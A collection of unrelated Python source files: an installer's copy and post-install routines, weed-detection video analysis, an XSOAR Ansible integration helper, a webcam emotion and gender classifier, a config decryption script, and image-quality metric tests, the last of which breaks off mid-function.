self.statusUpdate("Please wait...")
# Start copying files
fileLines = fileList.read().rstrip().split("\n")
nFiles = len(fileLines)
currFileNum = 0
myProgress = 0
for line in fileLines:
# Remove trailing whitespace and split on spaces
# File format:
# <source path> <dest path> <md5> <compulsory>
line = line.rstrip()
set = line.split(" ")
if(len(set) != 4):
self.drawError("Bad set in file list:\n" + line + "\nThis set only has " + str(len(set)) + " entries")
continue
# Create directory structure if required
dirSplit = set[1].split("/")
dirSplit = dirSplit[1:-1]
if(len(dirSplit) > 0):
currPath = "/"
                for dir in dirSplit:
                    currPath += dir + "/"
                    if(not os.path.isdir(self.installdir + currPath)):
                        os.mkdir(self.installdir + currPath)
# Update the progress
currFileNum += 1
myProgress = (currFileNum / float(nFiles)) * 100.0
self.drawProgress("Copying files", self.installdir + set[1], myProgress)
# Some files are meant to be empty, but present
if(len(set[0]) == 0):
f = open(self.installdir + set[1], "w")
f.close()
continue
# Copy the file
shutil.copy(self.filesdir + set[0], self.installdir + set[1])
# MD5 the newly copied file
newFile = open(self.installdir + set[1])
hex = hashlib.md5(newFile.read()).hexdigest()
newFile.close()
# Ensure the MD5 matches
if(hex != set[2]):
if(set[3] == "yes"):
self.drawError("Compulsory file failed verification:\n" + self.installdir + set[1])
                    raise InstallerException("Compulsory file failed verification: " + self.installdir + set[1])
else:
self.drawWarning("File " + str(currFileNum) + " failed verification, continuing anyway:\n" + self.installdir + set[1])
fileList.close()
self.statusUpdate("Copy complete.")
def postInstall(self):
self.statusUpdate("Please wait...")
# Files copied, run post-install scripts now
try:
postInstallFile = open(self.filesdir + "/postinstall.txt")
contents = postInstallFile.read()
            contents = contents.rstrip()
if(len(contents)):
num = 0
for line in contents.split("\n"):
num += 1
self.drawProgress("Running script", line, (num / float(len(contents))) * 100.0)
try:
p = os.popen(line)
print p.read()
p.close()
except:
self.drawWarning("Post-install script '" + str(line) + "' failed, continuing")
else:
raise
postInstallFile.close()
except:
self.statusUpdate("Post-install scripts complete.")
def waitForKeyPress(self):
self.stdscr.getch()
|
1620181
|
from greenonbrown import green_on_brown
from imutils.video import count_frames, FileVideoStream
import numpy as np
import imutils
import glob
import cv2
import csv
import os
def frame_analysis(exgFile: str, exgsFile: str, hueFile: str, exhuFile: str, HDFile: str):
baseName = os.path.splitext(os.path.basename(exhuFile))[0]
exgVideo = cv2.VideoCapture(exgFile)
print("[INFO] Loaded {}".format(exgFile))
lenexg = count_frames(exgFile, override=True) - 1
exgsVideo = cv2.VideoCapture(exgsFile)
print("[INFO] Loaded {}".format(exgsFile))
lenexgs = count_frames(exgsFile, override=True) - 1
hueVideo = cv2.VideoCapture(hueFile)
print("[INFO] Loaded {}".format(hueFile))
lenhue = count_frames(hueFile, override=True) - 1
exhuVideo = cv2.VideoCapture(exhuFile)
print("[INFO] Loaded {}".format(exhuFile))
lenexhu = count_frames(exhuFile, override=True) - 1
videoHD = cv2.VideoCapture(HDFile)
print("[INFO] Loaded {}".format(HDFile))
lenHD = count_frames(HDFile, override=True) - 1
hdFrame = None
exgFrame = None
exgsFrame = None
hueFrame = None
exhuFrame = None
hdframecount = 0
exgframecount = 0
exgsframecount = 0
hueframecount = 0
exhuframecount = 0
hdFramesAll = []
exgFramesAll = []
exgsFramesAll = []
hueFramesAll = []
exhuFramesAll = []
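    # Key bindings (derived from the loop below): q/w/e/r advance the exg/exgs/hue/exhu videos,
    # a/s/d/f step them back one frame, v/b do the same for the HD video, y saves the current
    # frames to images/frameGrabs, and Esc exits.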
while True:
k = cv2.waitKey(1) & 0xFF
if k == ord('v') or hdFrame is None:
if hdframecount >= len(hdFramesAll):
hdFrame = next(frame_processor(videoHD, 'hd'))
hdFrame = imutils.resize(hdFrame, height=640)
hdFrame = imutils.rotate(hdFrame, angle=180)
hdframecount += 1
hdFramesAll.append(hdFrame)
else:
hdFrame = hdFramesAll[hdframecount]
hdframecount += 1
if k == ord('q') or exgFrame is None:
if exgframecount >= len(exgFramesAll):
exgFrame = next(frame_processor(exgVideo, 'exg'))
exgframecount += 1
exgFramesAll.append(exgFrame)
else:
exgFrame = exgFramesAll[exgframecount]
exgframecount += 1
if k == ord('w') or exgsFrame is None:
if exgsframecount >= len(exgsFramesAll):
exgsFrame = next(frame_processor(exgsVideo, 'exgs'))
exgsframecount += 1
exgsFramesAll.append(exgsFrame)
else:
exgsFrame = exgsFramesAll[exgsframecount]
exgsframecount += 1
if k == ord('e') or hueFrame is None:
if hueframecount >= len(hueFramesAll):
hueFrame = next(frame_processor(hueVideo, 'hsv'))
hueframecount += 1
hueFramesAll.append(hueFrame)
else:
hueFrame = hueFramesAll[hueframecount]
hueframecount += 1
if k == ord('r') or exhuFrame is None:
if exhuframecount >= len(exhuFramesAll):
exhuFrame = next(frame_processor(exhuVideo, 'exhu'))
exhuframecount += 1
exhuFramesAll.append(exhuFrame)
else:
exhuFrame = exhuFramesAll[exhuframecount]
exhuframecount += 1
if k == ord('b'):
if hdframecount > 0:
hdframecount -= 1
hdFrame = hdFramesAll[hdframecount]
else:
hdFrame = hdFramesAll[hdframecount]
if k == ord('a'):
if exgframecount > 0:
exgframecount -= 1
exgFrame = exgFramesAll[exgframecount]
else:
exgFrame = exgFramesAll[exgframecount]
if k == ord('s'):
if exgsframecount > 0:
exgsframecount -= 1
exgsFrame = exgsFramesAll[exgsframecount]
else:
exgsFrame = exgsFramesAll[exgsframecount]
if k == ord('d'):
if hueframecount > 0:
hueframecount -= 1
hueFrame = hueFramesAll[hueframecount]
else:
hueFrame = hueFramesAll[hueframecount]
if k == ord('f'):
if exhuframecount > 0:
exhuframecount -= 1
exhuFrame = exhuFramesAll[exhuframecount]
else:
exhuFrame = exhuFramesAll[exhuframecount]
# save current frames for the video comparison
if k == ord('y'):
cv2.imwrite('images/frameGrabs/{}_frame{}_exg.png'.format(baseName, exgframecount), exgFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_exgs.png'.format(baseName, exgsframecount), exgsFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_hue.png'.format(baseName, hueframecount), hueFrame)
cv2.imwrite('images/frameGrabs/{}_frame{}_exhu.png'.format(baseName, exhuframecount), exhuFrame)
print('[INFO] All frames written.')
# write text on each video frame
exgVis = exgFrame.copy()
exgsVis = exgsFrame.copy()
hueVis = hueFrame.copy()
exhuVis = exhuFrame.copy()
cv2.putText(exhuVis, 'exhu: {} / {}'.format(exhuframecount, lenexhu), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(hueVis, 'hue: {} / {}'.format(hueframecount, lenhue), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(exgsVis, 'exgs: {} / {}'.format(exgsframecount, lenexgs), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(exgVis, 'exg: {} / {}'.format(exgframecount, lenexg), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
cv2.putText(hdFrame, 'HD: {} / {}'.format(hdframecount, lenHD), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0), 2)
# stack the video frames
topRow = np.hstack((exgVis, exgsVis))
bottomRow = np.hstack((hueVis, exhuVis))
combined = np.vstack((topRow, bottomRow))
combined = np.hstack((combined, hdFrame))
cv2.imshow('Output', combined)
if k == 27:
break
def frame_processor(videoFeed, videoName):
frameShape = None
while True:
k = cv2.waitKey(1) & 0xFF
ret, frame = videoFeed.read()
if ret == False:
frame = np.zeros(frameShape, dtype='uint8')
if frameShape is None:
frameShape = frame.shape
if videoName == "hd":
yield frame
else:
cnts, boxes, weedCentres, imageOut = green_on_brown(frame, exgMin=29,
exgMax=200,
hueMin=30,
hueMax=92,
saturationMin=10,
saturationMax=250,
brightnessMin=60,
brightnessMax=250,
headless=False,
algorithm=videoName, minArea=10)
yield imageOut
if k == 27:
            videoFeed.release()
break
import pandas as pd
def blur_analysis(directory):
blurDict = {}
df = pd.DataFrame(columns=['field', 'algorithm', 'blur'])
for videoPath in glob.iglob(directory + '\*.mp4'):
allframeBlur = []
sampledframeBlur = []
video = FileVideoStream(videoPath).start()
frameCount = 0
while True:
frame = video.read()
if video.stopped:
meanBlur = np.mean(allframeBlur)
stdBlur = np.std(allframeBlur)
vidName = os.path.basename(videoPath)
fieldNameList = [vidName.split("-")[0] for i in range(100)]
print(fieldNameList)
algorithmNameList = [os.path.splitext(vidName.split("-")[2])[0] for i in range(100)]
for i in range(100):
randint = np.random.randint(0, len(allframeBlur))
sampledframeBlur.append(allframeBlur[randint])
df2 = pd.DataFrame(list(zip(fieldNameList, algorithmNameList, sampledframeBlur)), columns=['field', 'algorithm', 'blur'])
print(df2)
df = df.append(df2)
print(df)
df.to_csv(r"videos\blur\blurriness.csv")
blurDict[vidName] = [meanBlur, stdBlur]
break
greyscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
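            # Variance of the Laplacian as a simple focus measure: lower values indicate blurrier frames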
blurriness = cv2.Laplacian(greyscale, cv2.CV_64F).var()
allframeBlur.append(blurriness)
frameCount += 1
print(vidName, ',', np.round(meanBlur, 2), ',', np.round(stdBlur, 2), ',', frameCount)
print(blurDict)
if __name__ == "__main__":
# RSilos 3 - DONE
# exgFile = r'videos/20210429-142930-HQ1-exg.avi'
# exgsFile = r'videos/20210429-143441-HQ1-exgs.avi'
# hueFile = r'videos/20210429-143559-HQ1-hue.avi'
# exhuFile = r'videos/20210429-143759-HQ1-exhu.avi'
# hdFile = r'videos/20210429_143950.mp4'
# # canola night 1
# exgFile = r'videos/20210429-174827-HQ2-exg.avi'
# exgsFile = r'videos/20210429-175001-HQ2-exgs.avi'
# hueFile = r'videos/20210429-175138-HQ2-hue.avi'
# exhuFile = r'videos/20210429-175307-HQ2-exhu.avi'
# hdFile = r'videos/20210429_175512.mp4'
# RWheat 1 - DONE
# exgFile = r'videos/20210429-145743-HQ1-exg.avi'
# exgsFile = r'videos/20210429-145942-HQ1-exgs.avi'
# hueFile = r'videos/20210429-150119-HQ1-hue.avi'
# exhuFile = r'videos/20210429-150254-HQ1-exhu.avi'
# hdFile = r'videos/20210429_150543.mp4'
# CSU Sheep 1 - DONE
# exgFile = r'videos/blur/CSUSheep1-HQ1-exg.mp4'
# exgsFile = r'videos/blur/CSUSheep1-HQ1-exgs.mp4'
# hueFile = r'videos/blur/CSUSheep1-HQ1-hue.mp4'
# exhuFile = r'videos/blur/CSUSheep1-HQ1-exhu.mp4'
# hdFile = r'videos/20210430_110451.mp4'
# DPI 3 - DONE
# exgFile = r'videos/blur/DPI3-HQ2-exg.mp4'
# exgsFile = r'videos/blur/DPI3-HQ1-exgs.mp4'
# hueFile = r'videos/blur/DPI3-HQ1-hue.mp4'
# exhuFile = r'videos/blur/DPI3-HQ1-exhu.mp4'
# hdFile = r'videos/20210430_094837.mp4'
# LD Day
# exgFile = r'videos/20210507-143847-HQ2-exg.avi'
# exgsFile = r'videos/20210507-144117-HQ2-exgs.avi'
# hueFile = r'videos/20210507-144241-HQ2-hue.avi'
# exhuFile = r'videos/20210507-144407-HQ2-exhu.avi'
# hdFile = r'videos/20210507_144808.mp4'
# LD Night
# exgFile = r'videos/20210506-184104-HQ2-exg.avi'
# exgsFile = r'videos/20210506-183237-HQ2-exgs.avi'
# hueFile = r'videos/20210506-183417-HQ2-hue.avi'
# exhuFile = r'videos/20210506-183601-HQ2-exhu.avi'
# hdFile = r'videos/20210506_183834.mp4'
# frame_analysis(exgFile=exgFile,
# exgsFile=exgsFile,
# hueFile=hueFile,
# exhuFile=exhuFile,
# HDFile=hdFile)
# blur analysis
directory = r"videos/blur"
blur_analysis(directory=directory)
|
1620187
|
from CommonServerPython import * # noqa: F403
from CommonServerUserPython import * # noqa: F403
import ansible_runner # pylint: disable=E0401
import json
from typing import Dict, cast, List, Union, Any
# Dict to Markdown Converter adapted from https://github.com/PolBaladas/torsimany/
def dict2md(json_block: Union[Dict[str, Union[dict, list]], List[Union[str, dict, list, float]], float], depth: int = 0):
markdown = ""
if isinstance(json_block, dict):
markdown = parse_dict(json_block, depth)
if isinstance(json_block, list):
markdown += parse_list(json_block, depth)
return markdown
def parse_dict(d: Dict[str, Union[dict, list]], depth: int):
markdown = ""
# In the case of a dict of dicts/lists, we want to show the "leaves" of the tree first.
# This will improve readability by avoiding the scenario where "leaves" are shown in between
    # "branches", resulting in their relation to the header becoming unclear to the reader.
for k in d:
if not isinstance(d[k], (dict, list)):
markdown += build_value_chain(k, d.get(k), depth + 1)
for k in d:
if isinstance(d[k], (dict, list)):
markdown += add_header(k, depth + 1)
markdown += dict2md(d[k], depth + 1)
return markdown
def parse_list(rawlist: List[Union[str, dict, list, float]], depth: int):
markdown = ""
default_header_value = "list"
for value in rawlist:
if not isinstance(value, (dict, list)):
index = rawlist.index(value)
            item_depth = depth + 1  # since a header was added previously, items should be indented one level deeper
markdown += build_value_chain(index, value, item_depth)
else:
# It makes list more readable to have a header of some sort
header_value = find_header_in_dict(value)
if header_value is None:
header_value = default_header_value
markdown += add_header(header_value, depth)
if isinstance(value, dict):
markdown += parse_dict(value, depth)
if isinstance(value, list):
markdown += parse_list(value, depth)
return markdown
def find_header_in_dict(rawdict: Union[Dict[Any, Any], List[Any]]):
header = None
    # Finds a suitable value to use as a header
if not isinstance(rawdict, dict):
return header # Not a dict, nothing to do
id_search = [val for key, val in rawdict.items() if 'id' in key]
name_search = [val for key, val in rawdict.items() if 'name' in key]
if id_search:
header = id_search[0]
if name_search:
header = name_search[0]
return header
def build_header_chain(depth: int):
list_tag = '* '
htag = '#'
tab = " "
chain = (tab * depth) + list_tag * (bool(depth)) + htag * (depth + 1) + ' value\n'
return chain
def build_value_chain(key: Union[int, str], value: Union[str, int, float, Dict[Any, Any], List[Any], None], depth: int):
tab = ' '
list_tag = '* '
chain = (tab * depth) + list_tag + str(key) + ": " + str(value) + "\n"
return chain
def add_header(value: str, depth: int):
chain = build_header_chain(depth)
chain = chain.replace('value', value.title())
return chain
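# Example (editor's note, illustrative input): dict2md({'host': 'web01', 'facts': {'os': 'Linux', 'cpus': 4}})
# emits the scalar leaf ("* host: web01") before the "## Facts" header and its nested bullets,
# i.e. the leaves-before-branches ordering described in parse_dict above.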
# Remove ansible branding from results
def rec_ansible_key_strip(obj: Dict[Any, Any]):
if isinstance(obj, dict):
return {key.replace('ansible_', ''): rec_ansible_key_strip(val) for key, val in obj.items()}
return obj
# Convert to TitleCase, like .title() but only letters/numbers.
def title_case(st: str):
output = ''.join(x for x in st.title() if x.isalnum())
return output
def generate_ansible_inventory(args: Dict[str, Any], int_params: Dict[str, Any], host_type: str = "local"):
host_types = ['ssh', 'winrm', 'nxos', 'ios', 'local']
if host_type not in host_types:
raise ValueError("Invalid host type. Expected one of: %s" % host_types)
sshkey = ""
inventory: Dict[str, dict] = {}
inventory['all'] = {}
inventory['all']['hosts'] = {}
# local
if host_type == 'local':
inventory['all']['hosts']['localhost'] = {}
inventory['all']['hosts']['localhost']['ansible_connection'] = 'local'
# All other host types are remote
elif host_type in ['ssh', 'winrm', 'nxos', 'ios']:
hosts = args.get('host')
if type(hosts) is str:
# host arg could be csv
hosts = [host.strip() for host in hosts.split(',')] # type: ignore[union-attr]
for host in hosts: # type: ignore[union-attr]
new_host = {}
new_host['ansible_host'] = host
if ":" in host:
address = host.split(':')
new_host['ansible_port'] = address[1]
new_host['ansible_host'] = address[0]
else:
new_host['ansible_host'] = host
if int_params.get('port'):
new_host['ansible_port'] = int_params.get('port')
# Common SSH based auth options
if host_type in ['ssh', 'nxos', 'ios']:
# SSH Key saved in credential manager selection
if int_params.get('creds', {}).get('credentials').get('sshkey'):
username = int_params.get('creds', {}).get('credentials').get('user')
sshkey = int_params.get('creds', {}).get('credentials').get('sshkey')
new_host['ansible_user'] = username
# Password saved in credential manager selection
elif int_params.get('creds', {}).get('credentials').get('password'):
username = int_params.get('creds', {}).get('credentials').get('user')
password = int_params.get('creds', {}).get('credentials').get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# username/password individually entered
else:
username = int_params.get('creds', {}).get('identifier')
password = int_params.get('creds', {}).get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# ssh specific become options
if host_type == 'ssh':
new_host['ansible_become'] = int_params.get('become')
new_host['ansible_become_method'] = int_params.get('become_method')
if int_params.get('become_user'):
new_host['ansible_become_user'] = int_params.get('become_user')
if int_params.get('become_password'):
new_host['ansible_become_pass'] = int_params.get('become_password')
# ios specific
if host_type == 'ios':
new_host['ansible_connection'] = 'network_cli'
new_host['ansible_network_os'] = 'ios'
new_host['ansible_become'] = 'yes'
new_host['ansible_become_method'] = 'enable'
new_host['ansible_become_password'] = int_params.get('enable_password')
inventory['all']['hosts'][host] = new_host
# nxos specific
elif host_type == 'nxos':
new_host['ansible_connection'] = 'network_cli'
new_host['ansible_network_os'] = 'nxos'
new_host['ansible_become'] = 'yes'
new_host['ansible_become_method'] = 'enable'
inventory['all']['hosts'][host] = new_host
# winrm
elif host_type == 'winrm':
# Only two credential options
# Password saved in credential manager selection
if int_params.get('creds', {}).get('credentials').get('password'):
username = int_params.get('creds', {}).get('credentials').get('user')
password = int_params.get('creds', {}).get('credentials').get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
# username/password individually entered
else:
username = int_params.get('creds', {}).get('identifier')
password = int_params.get('creds', {}).get('password')
new_host['ansible_user'] = username
new_host['ansible_password'] = password
new_host['ansible_connection'] = "winrm"
new_host['ansible_winrm_transport'] = "ntlm"
new_host['ansible_winrm_server_cert_validation'] = "ignore"
inventory['all']['hosts'][host] = new_host
return inventory, sshkey
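# A minimal sketch (hypothetical host and credential values) of the inventory
# structure generate_ansible_inventory() builds for an 'ssh' host; the keys mirror
# the assignments made above:
#   inventory = {'all': {'hosts': {'192.0.2.10': {
#       'ansible_host': '192.0.2.10',
#       'ansible_user': 'admin',
#       'ansible_password': '****',
#       'ansible_become': False,
#       'ansible_become_method': 'sudo'}}}}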
def generic_ansible(integration_name: str, command: str,
args: Dict[str, Any], int_params: Dict[str, Any], host_type: str,
creds_mapping: Dict[str, str] = None) -> CommandResults:
"""Run a Ansible module and return the results as a CommandResult.
Keyword arguments:
integration_name -- the name of the XSOAR integration. Used for context output structure
command -- the ansible module to run
args -- the XSOAR command args. Literally the demisto.args(). The args provided need to match the
ansible module args, as well as include the arg "host" if the module is one that connects
to a host.
int_params -- the integration parameters. These will contain args that are integration wide.
                  They will be passed to the ansible module as args, with the exception of credentials,
                  which will be used to build the ansible inventory instead.
host_type -- the type of host that is being managed. The following host types are supported:
* ssh -- Linux or Unix variant managed over ssh
* winrm -- Windows
* nxos -- Cisco NX-OS based network device
* ios -- Cisco IOS based network device
* local -- this indicates that the command should be executed locally.
Mostly used by modules that connect out to cloud services.
creds_mapping -- A mapping for the 'creds' param names to expected ansible param names
"""
readable_output = ""
sshkey = ""
fork_count = 1 # default to executing against 1 host at a time
if args.get('concurrency'):
fork_count = cast(int, args.get('concurrency'))
# generate ansible host inventory
inventory, sshkey = generate_ansible_inventory(args=args, host_type=host_type, int_params=int_params)
module_args = ""
# build module args list
for arg_key, arg_value in args.items():
        # skip hardcoded host arg, as it doesn't relate to the module
if arg_key == 'host':
continue
        # special case for when there is a collision between the host argument used for the ansible inventory
        # and the host argument used by a module
if arg_key == 'ansible-module-host':
arg_key = 'host'
module_args += "%s=\"%s\" " % (arg_key, arg_value)
# If this isn't host based, then all the integration params will be used as command args
if host_type == 'local':
for arg_key, arg_value in int_params.items():
# if given creds param and a cred mapping - use the naming mapping to correct the arg names
if arg_key == 'creds' and creds_mapping:
if arg_value.get('identifier') and 'identifier' in creds_mapping:
module_args += "%s=\"%s\" " % (creds_mapping.get('identifier'), arg_value.get('identifier'))
if arg_value.get('password') and 'password' in creds_mapping:
module_args += "%s=\"%s\" " % (creds_mapping.get('password'), arg_value.get('password'))
else:
module_args += "%s=\"%s\" " % (arg_key, arg_value)
r = ansible_runner.run(inventory=inventory, host_pattern='all', module=command, quiet=True,
omit_event_data=True, ssh_key=sshkey, module_args=module_args, forks=fork_count)
results = []
outputs_key_field = ''
for each_host_event in r.events:
# Troubleshooting
# demisto.log("%s: %s\n" % (each_host_event['event'], each_host_event))
if each_host_event['event'] in ["runner_on_ok", "runner_on_unreachable", "runner_on_failed"]:
# parse results
result = json.loads('{' + each_host_event['stdout'].split('{', 1)[1])
host = each_host_event['stdout'].split('|', 1)[0].strip()
status = each_host_event['stdout'].replace('=>', '|').split('|', 3)[1]
# if successful build outputs
if each_host_event['event'] == "runner_on_ok":
if 'fact' in command:
result = result['ansible_facts']
else:
if result.get(command) is not None:
result = result[command]
else:
result.pop("ansible_facts", None)
result = rec_ansible_key_strip(result)
if host != "localhost":
readable_output += "# %s - %s\n" % (host, status)
else:
                    # This integration is not host based
readable_output += "# %s\n" % status
readable_output += dict2md(result)
# add host and status to result if it is a dict. Some ansible modules return a list
if (type(result) == dict) and (host != 'localhost'):
result['host'] = host
outputs_key_field = 'host' # updates previous outputs that share this key, neat!
if (type(result) == dict):
result['status'] = status.strip()
results.append(result)
if each_host_event['event'] == "runner_on_unreachable":
msg = "Host %s unreachable\nError Details: %s" % (host, result.get('msg'))
if each_host_event['event'] == "runner_on_failed":
msg = "Host %s failed running command\nError Details: %s" % (host, result.get('msg'))
if each_host_event['event'] in ["runner_on_failed", "runner_on_unreachable"]:
return_error(msg)
return CommandResults(
readable_output=readable_output,
outputs_prefix=integration_name + '.' + title_case(command),
outputs_key_field=outputs_key_field,
outputs=results
)
|
1620226
|
import cv2
import numpy as np
import os.path
from cv2 import WINDOW_NORMAL
from face_detection import find_faces
ESC = 27
def start_webcam(model_emotion, model_gender, window_size, window_name='live', update_time=50):
cv2.namedWindow(window_name, WINDOW_NORMAL)
    video_feed = cv2.VideoCapture(0)
    if window_size:
        width, height = window_size
        cv2.resizeWindow(window_name, width, height)
        # set the capture resolution to match the requested window size
        video_feed.set(3, width)   # cv2.CAP_PROP_FRAME_WIDTH
        video_feed.set(4, height)  # cv2.CAP_PROP_FRAME_HEIGHT
read_value, webcam_image = video_feed.read()
delay = 0
init = True
while read_value:
read_value, webcam_image = video_feed.read()
for normalized_face, (x, y, w, h) in find_faces(webcam_image):
if init or delay == 0:
init = False
emotion_prediction = model_emotion.predict(normalized_face)
gender_prediction = model_gender.predict(normalized_face)
if (gender_prediction[0] == 0):
cv2.rectangle(webcam_image, (x,y), (x+w, y+h), (0,0,255), 2)
else:
cv2.rectangle(webcam_image, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.putText(webcam_image, emotions[emotion_prediction[0]], (x,y-10), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)
delay += 1
delay %= 20
cv2.imshow(window_name, webcam_image)
key = cv2.waitKey(update_time)
if key == ESC:
break
cv2.destroyWindow(window_name)
def analyze_picture(model_emotion, model_gender, path, window_size, window_name='static'):
cv2.namedWindow(window_name, WINDOW_NORMAL)
if window_size:
width, height = window_size
cv2.resizeWindow(window_name, width, height)
image = cv2.imread(path, 1)
for normalized_face, (x, y, w, h) in find_faces(image):
emotion_prediction = model_emotion.predict(normalized_face)
gender_prediction = model_gender.predict(normalized_face)
if (gender_prediction[0] == 0):
cv2.rectangle(image, (x,y), (x+w, y+h), (0,0,255), 2)
else:
cv2.rectangle(image, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.putText(image, emotions[emotion_prediction[0]], (x,y-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,255), 2)
cv2.imshow(window_name, image)
key = cv2.waitKey(0)
if key == ESC:
cv2.destroyWindow(window_name)
if __name__ == '__main__':
emotions = ["afraid", "angry", "disgusted", "happy", "neutral", "sad", "surprised"]
# Load model
fisher_face_emotion = cv2.face.FisherFaceRecognizer_create()
fisher_face_emotion.read('models/emotion_classifier_model.xml')
fisher_face_gender = cv2.face.FisherFaceRecognizer_create()
fisher_face_gender.read('models/gender_classifier_model.xml')
# Use model to predict
choice = input("Use webcam?(y/n) ")
if (choice == 'y'):
window_name = "Facifier Webcam (press ESC to exit)"
start_webcam(fisher_face_emotion, fisher_face_gender, window_size=(1280, 720), window_name=window_name, update_time=15)
elif (choice == 'n'):
run_loop = True
window_name = "Facifier Static (press ESC to exit)"
print("Default path is set to data/sample/")
print("Type q or quit to end program")
while run_loop:
path = "../data/sample/"
file_name = input("Specify image file: ")
if file_name == "q" or file_name == "quit":
run_loop = False
else:
path += file_name
if os.path.isfile(path):
analyze_picture(fisher_face_emotion, fisher_face_gender, path, window_size=(1280, 720), window_name=window_name)
else:
print("File not found!")
else:
print("Invalid input, exiting program.")
|
1620247
|
import os
import logging
from getpass import getpass
from skcom.crypto import decrypt_text
def main():
logger = logging.getLogger('helper')
cfg_path = os.path.expanduser(r'~\.skcom\skcom.yaml')
try:
        # Decrypt the config file
with open(cfg_path + '.enc', 'rb') as enc_file:
secret = enc_file.read()
        password = getpass('Enter the config file password: ')
plain = decrypt_text(secret, password)
        # Save the plaintext config file, then delete the encrypted one
with open(cfg_path, 'w', encoding='utf-8') as cfg_file:
cfg_file.write(plain)
os.remove(cfg_path + '.enc')
        logger.info('Decryption complete')
except Exception as ex:
logger.error(ex)
if __name__ == '__main__':
main()
|
1620281
|
import torch
import itertools
import pytest
from piq import InformationWeightedSSIMLoss, information_weighted_ssim
from typing import Tuple, List
from skimage.io import imread
from contextlib import contextmanager
@contextmanager
def raise_nothing(enter_result=None):
yield enter_result
@pytest.fixture(scope='module')
def x_rand() -> torch.Tensor:
return torch.rand(3, 3, 161, 161)
@pytest.fixture(scope='module')
def y_rand() -> torch.Tensor:
return torch.rand(3, 3, 161, 161)
@pytest.fixture(scope='module')
def ones_zeros_4d() -> Tuple[torch.Tensor, torch.Tensor]:
return torch.ones(3, 3, 161, 161), torch.zeros(3, 3, 161, 161)
@pytest.fixture(scope='module')
def test_images() -> List[Tuple[torch.Tensor, torch.Tensor]]:
x_grey = torch.tensor(imread('tests/assets/goldhill_jpeg.gif')).unsqueeze(0).unsqueeze(0)
y_grey = torch.tensor(imread('tests/assets/goldhill.gif')).unsqueeze(0).unsqueeze(0)
x_rgb = torch.tensor(imread('tests/assets/I01.BMP')).permute(2, 0, 1).unsqueeze(0)
y_rgb = torch.tensor(imread('tests/assets/i01_01_5.bmp')).permute(2, 0, 1).unsqueeze(0)
return [(x_grey, y_grey), (x_rgb, y_rgb)]
@pytest.fixture(scope='module')
def scale_weights() -> torch.Tensor:
return torch.tensor([0.0448, 0.2856, 0.3001, 0.2363, 0.1333])
# ================== Test function: `information_weighted_ssim` ==================
def test_iw_ssim_measure_is_one_for_equal_tensors(x_rand: torch.Tensor, device: str) -> None:
x_rand = x_rand.to(device)
y_rand = x_rand.clone()
measure = information_weighted_ssim(x_rand, y_rand, data_range=1.)
assert torch.allclose(measure, torch.ones_like(measure)), \
f'If equal tensors are passed IW-SSIM must be equal to 1 ' \
        f'(considering floating point operation error up to 1 * 10^-6), got {measure}'
def test_iw_ssim_reduction(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
for mode in ['mean', 'sum', 'none']:
information_weighted_ssim(x_rand.to(device), y_rand.to(device), reduction=mode)
for mode in [None, 'n', 2]:
with pytest.raises(ValueError):
information_weighted_ssim(x_rand.to(device), y_rand.to(device), reduction=mode)
def test_iw_ssim_raises_if_tensors_have_different_shapes(x_rand: torch.Tensor, y_rand: torch.Tensor,
scale_weights: torch.Tensor, device: str) -> None:
dims = [[3], [2, 3], [160, 161], [160, 161]]
for size in list(itertools.product(*dims)):
wrong_shape_x = torch.rand(size).to(x_rand)
print(wrong_shape_x.size())
if wrong_shape_x.size() == x_rand.size():
information_weighted_ssim(wrong_shape_x.to(device), x_rand.to(device))
else:
with pytest.raises(AssertionError):
information_weighted_ssim(wrong_shape_x.to(device), x_rand.to(device))
information_weighted_ssim(x_rand.to(device), y_rand.to(device), scale_weights=scale_weights.to(device))
wrong_scale_weights = torch.rand(2, 2)
with pytest.raises(ValueError):
information_weighted_ssim(x_rand.to(device), y_rand.to(device), scale_weights=wrong_scale_weights.to(device))
def test_iw_ssim_raises_if_tensors_have_different_types(x_rand: torch.Tensor, device: str) -> None:
wrong_type_x = list(range(10))
with pytest.raises(AssertionError):
information_weighted_ssim(wrong_type_x, x_rand.to(device))
def test_iw_ssim_raises_if_kernel_size_greater_than_image(x_rand: torch.Tensor, y_rand: torch.Tensor,
device: str) -> None:
kernel_size = 11
levels = 5
min_size = (kernel_size - 1) * 2 ** (levels - 1) + 1
wrong_size_x = x_rand[:, :, :min_size - 1, :min_size - 1]
wrong_size_y = y_rand[:, :, :min_size - 1, :min_size - 1]
with pytest.raises(ValueError):
information_weighted_ssim(wrong_size_x.to(device), wrong_size_y.to(device), kernel_size=kernel_size)
@pytest.mark.parametrize(
"data_range", [128, 255],
)
def test_iw_ssim_supports_different_data_ranges(x_rand: torch.Tensor, y_rand: torch.Tensor, data_range: int,
device: str) -> None:
x_scaled = (x_rand * data_range).type(torch.uint8)
y_scaled = (y_rand * data_range).type(torch.uint8)
measure_scaled = information_weighted_ssim(x_scaled.to(device), y_scaled.to(device), data_range=data_range)
measure = information_weighted_ssim(
x_scaled.to(device) / float(data_range),
y_scaled.to(device) / float(data_range),
data_range=1.0
)
diff = torch.abs(measure_scaled - measure)
assert (diff <= 1e-6).all(), f'Result for same tensor with different data_range should be the same, got {diff}'
def test_iw_ssim_fails_for_incorrect_data_range(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
# Scale to [0, 255]
x_scaled = (x_rand * 255).type(torch.uint8)
y_scaled = (y_rand * 255).type(torch.uint8)
with pytest.raises(AssertionError):
